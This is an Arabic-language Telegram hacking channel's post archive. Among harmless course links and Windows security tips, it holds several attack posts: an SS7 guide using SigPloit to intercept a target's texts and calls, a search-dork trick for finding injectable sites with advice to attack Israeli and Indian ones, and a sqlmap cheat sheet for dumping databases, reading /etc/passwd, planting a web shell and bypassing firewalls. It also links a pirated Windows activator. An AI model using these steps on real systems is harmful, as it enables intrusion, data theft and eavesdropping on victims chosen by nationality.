KEP TEAM 🕷
Открыть в Telegram
Top #1 Palestinian Cyber Security and Hackers Top #1 Palestine Hacker
Больше2 241
Подписчики
-224 часа
-107 дней
-3930 день
Архив постов
2 241
قبل ان تدخل عالم الاختراق يجب ان تتعلم اهم الامور لكي تفهم المجال وتتعامل معه بشكل جيد
Hardware
Network+
it administarion
Security+
Linux+
A+
Project+
Mobile App Security+
server+
mobility+
CISSP
CEH
CISA
GCIA
CEH
PTP
OSCP
OSWP
OSWE
OSCE
OSEE
2 241
كيفية الهجوم ss7
حتى تقوم بعمل هجمة بروتوكول ss7، تحتاج إلى أدوات مادية لتحليل الاتصالات، كذلك أدوات برمجية.
أداة SigPloit
أداة SigPloit هي برمجية لاختبار إشارات الشبكة الاتصالات اللاسلكية المحلية وتستخدم أيضًا في عملية استغلال ثغرة بروتوكول ss7.
تنزيل وتثبيت أداة SigPloit
أولًا نقوم بتنزيلها من موقع github من هذا الرابط أو بالأمر التالي لتنزيل الملف مباشرةً
git clone https://web.archive.org/web/20201203032412/https://github.com/SigPloiter/SigPloit
بعد التنزيل نقوم بعملية التثبيت
cd SigPloitsudo pip2
install -r requirements.txt
python sigsloit.py
ثانيًا: اختيار الوحدة النمطية كـ SS7
ثعرة الاتصالات ss7
اختيار الوحدة النمطية
ثالثًا: ضبط الخيارات:
client_pc
serve-pc
server IP
port
MSISDN
استغلال بروتوكول ss7
ضبط الخيارات للتطبيق
ثم ادخال رقم الهاتف.
رابعًا: التقاط الحزم من أي محلل مثل الواير شارك.
من خلال تحليل الحزم في ثغرة ss7 يمكنك التنصت على الحزم والتي تتضمن الرسائل النصية والمكالمات الهاتفية.
خامسًا: جمع المعلومات باستخدام أداة “HackRF one
2 241
للبحث عن مواقع مصابه اذهب الى كروم واكتب
php?id= 86
php?id=
php?id= Israel
php?id= india
سيظهر موقع كثيرة مصابه ابحث عن المواقع المصابة وانصحك بل الموقع الإسرائيلية والهنديه
2 241
أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL
لغة الاستعلامات الهيكلية ، والتي تُعرف باسم SQL ، هي لغة البرمجة الشائعة التي تسطرها معظم أنظمة إدارة قواعد البيانات. يوفر طريقة شائعة للتطبيق للوصول إلى البيانات الموجودة في قاعدة البيانات باستخدام مجموعة مشتركة من الأوامر التي يمكن لقاعدة البيانات فهمها.
يستغل المهاجمون قواعد البيانات هذه بجعلهم يخرجون معلومات لا ينبغي لهم عرضها. أحيانًا يكون هذا بسيطًا مثل المهاجم الذي يطلب معلومات مميزة من نظام إدارة قاعدة البيانات . في أحيان أخرى ، يستفيد من التكوينات الضعيفة من قبل مسؤولي قواعد البيانات.
من الاستطلاع إلى تغطية المسارات - 5 مراحل للقرصنة الأخلاقية
من الألف إلى الياء - مؤشر ثغرات الويب - معيار OWASP
من الألف إلى الياء - مجموعة أدوات الأمن السيبراني
قد يستفيد المهاجمون أيضًا من ثغرة أمنية في نظام إدارة قاعدة البيانات تسمح للمهاجم بعرض أو كتابة أوامر مميزة من قاعدة البيانات وإليها.
تقوم Sqlmap بأتمتة عملية اكتشاف واستغلال الثغرات الأمنية لحقن SQL والاستيلاء على خوادم قواعد البيانات. يأتي Sqlmap مزودًا بمحرك كشف ، بالإضافة إلى مجموعة واسعة من ميزات اختبار الاختراق (PT) التي تتراوح من بصمة قاعدة البيانات إلى الوصول إلى نظام الملفات الأساسي وتنفيذ الأوامر على نظام التشغيل عبر اتصالات خارج النطاق.
الصيغة الأساسية لاستخدام Sqlmap هي:
sqlmap -u URL - - وظيفة
فيما يلي قائمة بأهم أوامر SQLMAP المفيدة التي يمكنك استخدامها ضد هدفك الضعيف:
1. طلب الحصول على
sqlmap -u http://example.com/page.php?id=1 --dbs
2. من ملف
sqlmap -r request.txt
3. الاختبار باستخدام نمط عناوين URL
sqlmap -u http://example.com/page/*/view --dbs
4. طلب POST
sqlmap -u http://example.com/login.php --data "username=admin&pass=admin&submit=submit" -p username
5. استخدام ملفات تعريف الارتباط
sqlmap -u http://example.com/enter.php --cookie="PHPSESSID=45634b63g643f563456g4356g" -u http://example.com/index.php?id=1
6. استخراج قواعد البيانات (تعداد قاعدة البيانات)
sqlmap -u http://example.com/page.php?id=1 --dbs
7. تحديد قاعدة البيانات الحالية
sqlmap -u http://example.com/page.php?id=1 --current-db
8. استخراج الجداول
sqlmap -u http://example.com/page.php?id=1 -D database --tables
9. استخراج الأعمدة
sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns
10. إغراق البيانات
sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C colum1,column2 --dump
11. تعدد
sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5
12. لا يوجد اتصال
sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection
13. اتصال HTTP المستمر
sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive
14. إخراج التنبؤ
sqlmap -u http://example.com/page.php?id=1 -D database -T user -c users,password --dump --predict-output
15. فحص الامتيازات
sqlmap -u http://example.com/page.php?id=1 --privileges
16. قراءة الملفات من الخادم
sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/passwd
17. تحميل الملفات / شل
sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php
18. SQL شل
sqlmap -u http://example.com/page.php?id=1 --sql-shell
19. قذيفة نظام التشغيل
sqlmap -u http://example.com/page.php?id=1 --os-shell
20. إكس أمر نظام التشغيل بدون تحميل شل
sqlmap -u http://example.com/page.php?id=1 --os-cmd "uname -a"
21. باستخدام الوكيل
sqlmap --proxy="127.0.0.1:8080" -u http://example.com/page.php?id=1 --dbs
22. استخدام الوكيل مع أوراق الاعتماد
sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u http://example.com/page.php?id=1
23. الزحف
sqlmap -u http://example.com/ --crawl=1
24. الاستغلال في وضع الإسهاب
sqlmap -u http://example.com/page.php?id=1 -v 3
25. تجاوز WAF (جدار حماية تطبيق الويب)
sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask
26. مسح صفحة المصادقة القائمة على المفتاح
sqlmap -u http://example.com/page.php?id=1 --auth-file=
27. لاستخدام شبكة TOR الافتراضية
sqlmap -u http://example.com/page.php?id=1 --tor
28. المسح مع ارتفاع المخاطر والمستوى
sqlmap -u http://example.com/page.php?id=1 --level=3 --risk=5
2 241
كورسات مجانية في الأمن السيبراني
كورس CEH
https://youtube.com/playlist?list=PLfnsjJ3BcOKypPGR0wyt2WkxgKsuH6H4n
كورس eJPT
https://youtube.com/playlist?list=PLky4bd7_03m-NU50dSLbA5051Eyllao-Q
كورس CCNA
https://youtube.com/playlist?list=PLAqaqJU4wzYXBeFUFYs4qQ2qnWm_28xBV
دبلوم SOC Analyst
https://youtube.com/playlist?list=PLs6emGC4vqRJgC24y3OwicEuUHZks4eu6
كورس CHFI
https://youtube.com/playlist?list=PLs6emGC4vqRITMh6cfnHO5FXmm9EOre6V
كورس ISO 27001 Lead Implementer
https://youtube.com/playlist?list=PLs6emGC4vqRLD0VNKcBmdzdLkvb9THOrS
https://t.me/KEP_TEAM
2 241
⛔❌ تنبيه : مهم جدا ❌⛔
شركة واتساب قامت بالاونة الاخيرة باجراءات مشددة لمستخدمي نظام اندرويد و ios وتقوم بحملة حظر مؤقت او دائم وهذا يشمل الواتساب الرسمي والبلس وجميع النسخ المعدلة.
السبب هم يراقبون عدد الانشطة الغير قانونية التي نقوم بها كل يوم وهذا الامر (مؤقتا وليس دائم)
نحن نعمل بالعثور على حل مناسب
لذلك تجنب ما يلي:
❌1. أضافتك الى اي مجموعات بشكل عشوائي.(الإعدادات>الحساب>الخصوصية>المجموعات اختر جهات اتصالي)
❌2. تسجيل الدخول في أجهزة متعددة.
❌ 3. مشاركة الرسائل غير المرغوب بها الصور أو الفيديو.
❌ 4. استخدام الرسائل الجماعية للأشخاص.
❌ 5. ارسال الرسائل الجماعية لاكثر من 5 اشخاص (الاضافات والخصائص>الكل ثيم لجميع الواجهات> الاعدادات>ثم الغي تفعيل زيادة حد تحويل الرسائل) .
❌ 6. تغيير المشرفين بشكل عشوائي في المجموعات.
❌ 7. ارسال الوسائط في الرسائل الجماعية
اذكر المصدر.
https://t.me/KEP_TEAM
#hack
2 241
تحميل برنامج تفعيل الويندوز Windows Loader 2022 💡
يعد برنامج Windows Loader v2.2.2 أداة لتنشيط نظام Microsoft Windows وتفعيل النظام الخاص بك. يمكنه تنشيط نظام التشغيل Windows Vista و Windows 7 و Windows 8 / 8.1 و Windows 10
🔗: https://techyourhouse.com/?p=573
2 241
الأمن المعلوماتي لتأمين نظام تشغيل “مايكروسوفت ويندوز” الذي يعد نظام التشغيل الأول على مستوى العالم، وذلك باتباع طريقة المصادقة المكونة من خطوتين، والتي تعتمد على استخدام خطوة تأكيد أخرى بخلاف كلمة المرور الخاصة بنظام تشغيلك.
وتعتمد المصادقة ذات الخطوتين على طلب النظام منك إدخال كلمة مرور أخرى يقوم بإرسالها إلى رقم هاتفك الشخصي، بخلاف كلمة المرور الأساسية التي تستخدمها للوصول للنظام، ويمكن تنفيذ هذه الطريقة عن طريق الخطوات التالية:
ادخل على موقع “مايكروسوفت ويندوز” من الرابط https://www.microsoft.com/ar-eg.
اضغط على ملف تعريف الحساب، ثم قم بتسجيل الدخول إلى حسابك.
اضغط على الآمان “Security”.
اضغط على Two step verification.
وأخيراً يجب أن تستخدم كلمة مرور قوية مكونة من حروف ورموز لتحقيق أكبر قدر من الآمان لحسابك.
2 241
احمي جهازك من الاختراق بخطوات بسيطة .. تأمين نسخة الـ”ويندوز”
أصبح تأمين وحماية نظام التشغيل “ويندوز” الذي يعمل به جهازك أمرا في غاية الأهمية، خاصة مع انتشار أعمال الاختراق من قبل بعض المتلصصين، فنظام التشغيل هو المدخل الأول الذي إذا استطاع المخترق الولوج إليه، أصبح من السهل عليه الوصول لجميع كلمات المرور الخاصة بأي حساب شخصي موجود على حاسبك، الأمر الذي قد يتسبب لك في الكثير من المتاعب، ولذلك سنتعرف سويا في السطور التالية على خطوات بسيطة تستطيع من خلالها تأمين نظام تشغيل “مايكروسوفت ويندوز” من أي محاولة للاختراق
Уже доступно! Исследование Telegram 2025 — ключевые инсайты года 
